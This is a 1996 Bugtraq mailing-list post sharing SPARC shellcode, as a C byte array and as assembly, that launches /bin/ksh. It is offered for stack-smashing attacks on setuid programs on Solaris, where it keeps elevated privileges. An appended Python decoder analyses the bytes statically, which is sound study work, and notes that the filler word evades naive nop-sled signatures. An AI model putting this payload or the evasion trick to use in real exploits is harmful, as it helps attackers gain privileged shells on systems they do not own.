Bugtraq mailing list archives
/bin/ksh sparc code
From: zomo () home serome co kr (Kichang Yang)
Date: Tue, 3 Dec 1996 20:22:22 +0900
It seems that the "smashin' the stack" attack (the term is borrowed from Aleph1's article) is the hottest topic on bugtraq these days (except the symlink-to-/.rhosts attack, of course). If I remember correctly, the sparc code that appeared on bugtraq does something like execl("/bin/sh","sh",0), and, you know, Solaris 2.4 /bin/sh does setuid(getuid()) unless "-p" is specified, so it's kinda useless when it comes to attacking setuid'ed files. So, I made sparc code for doing something *like* execl("/bin/ksh","ksh",0). I know it's no big deal, almost close to lame, but I think it's kinda useful. You'd like to check out Aleph1's article that appeared (or will appear?) in Phrack 49.

I tested it on sun4d and I'm not sure it would work on other architectures.

Bye.

-- ksh.sparc.code.c

/* 0xac15a16e is also the second word of the shellcode: "or %l6, 0x16e, %l6" */
#define SPARC_NOP 0xac15a16e

char ksh_sparc_shellcode[] =
    "\x2d\x0b\xd8\x9a" "\xac\x15\xa1\x6e" "\x2f\x0b\xda\xdc" "\xae\x15\xe3\x68"
    "\x90\x0b\x80\x0e" "\x92\x03\xa0\x0c" "\x94\x1a\x80\x0a" "\x9c\x03\xa0\x14"
    "\xec\x3b\xbf\xec" "\xc0\x23\xbf\xf4" "\xdc\x23\xbf\xf8" "\xc0\x23\xbf\xfc"
    "\x82\x10\x20\x3b" "\x91\xd0\x20\x08" "\x90\x1b\xc0\x0f" "\x82\x10\x20\x01"
    "\x91\xd0\x20\x08";

-- ksh.sparc.s

        .section ".data1"
        .align 4
.L16:
        .ascii "ksh.sparc.code goes\n\0"
        .section ".text"
        .global main
main:
        save %sp, -96, %sp
        set .L16, %o0
        call printf, 1
        nop
        sethi %hi(0x2f626800), %l6     ! %l6:%l7 = the 8 bytes "/bin/ksh"
        or %l6, 0x16e, %l6             ! (this word is SPARC_NOP above)
        sethi %hi(0x2f6b7000), %l7
        or %l7, 0x368, %l7
        and %sp, %sp, %o0              ! %o0..%o2: system call arguments
        add %sp, 12, %o1
        xor %o2, %o2, %o2
        add %sp, 20, %sp
        std %l6, [%sp - 20]            ! write the string and pointers below the new %sp
        st %g0, [%sp - 12]
        st %sp, [%sp - 8]
        st %g0, [%sp - 4]
        mov 0x3b, %g1                  ! %g1 = system call number
        ta 8                           ! trap into the kernel
        xor %o7, %o7, %o0
        mov 1, %g1                     ! exit
        ta 8
        restore

--
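To see what the posted bytes do without executing them, here is an added Python decoder (not part of Kichang Yang's post) that walks the shellcode word by word, recovers the 32-bit constants built by sethi/or pairs, and records the value in %g1 at each "ta 8" trap. It assumes SPARC V8 instruction encoding and the Solaris syscall numbering (59 = execve, 1 = exit).

```python
"""Added example: static decode of the shellcode bytes from the post above.
Assumes SPARC V8 instruction encoding (big-endian 32-bit words)."""
import struct

# Bytes copied from ksh_sparc_shellcode[] in the post.
KSH_SPARC = bytes.fromhex(
    "2d0bd89a" "ac15a16e" "2f0bdadc" "ae15e368" "900b800e" "9203a00c"
    "941a800a" "9c03a014" "ec3bbfec" "c023bff4" "dc23bff8" "c023bffc"
    "8210203b" "91d02008" "901bc00f" "82102001" "91d02008"
)
SPARC_NOP = 0xAC15A16E  # the post's filler constant


def decode(word):
    """Decode only the forms the analysis needs: sethi, or-immediate, Tcc."""
    op = word >> 30
    rd = (word >> 25) & 0x1F
    if op == 0 and ((word >> 22) & 7) == 4:           # sethi imm22, rd
        return ("sethi", rd, (word & 0x3FFFFF) << 10)
    if op == 2:
        op3 = (word >> 19) & 0x3F
        rs1 = (word >> 14) & 0x1F
        imm = word & 0x1FFF
        if imm & 0x1000:                               # sign-extend simm13
            imm -= 0x2000
        if (word >> 13) & 1:                           # immediate form
            if op3 == 0x02:                            # or rs1, simm13, rd
                return ("or", rd, rs1, imm)
            if op3 == 0x3A:                            # Tcc, e.g. "ta 8"
                return ("trap", imm & 0x7F)
    return ("other", word)


def analyse(code):
    """Return (bytes built via sethi/or pairs, %g1 value at each 'ta 8')."""
    regs = {}            # register number -> last known constant
    built = b""
    traps = []
    for (word,) in struct.iter_unpack(">I", code):
        ins = decode(word)
        if ins[0] == "sethi":
            regs[ins[1]] = ins[2]
        elif ins[0] == "or":
            _, rd, rs1, imm = ins
            paired = rd == rs1 and rs1 in regs         # completes a sethi/or pair
            regs[rd] = (regs.get(rs1, 0) | imm) & 0xFFFFFFFF
            if paired:
                built += struct.pack(">I", regs[rd])
        elif ins[0] == "trap" and ins[1] == 8:
            traps.append(regs.get(1))                  # %g1 holds the syscall number
    return built, traps


if __name__ == "__main__":
    s, t = analyse(KSH_SPARC)
    print(s, [hex(n) for n in t])                      # b'/bin/ksh' ['0x3b', '0x1']
```

Because the filler constant decodes as a real "or" into %l6, a sled of SPARC_NOP words is not the 0x01000000 nop pattern a naive signature might look for.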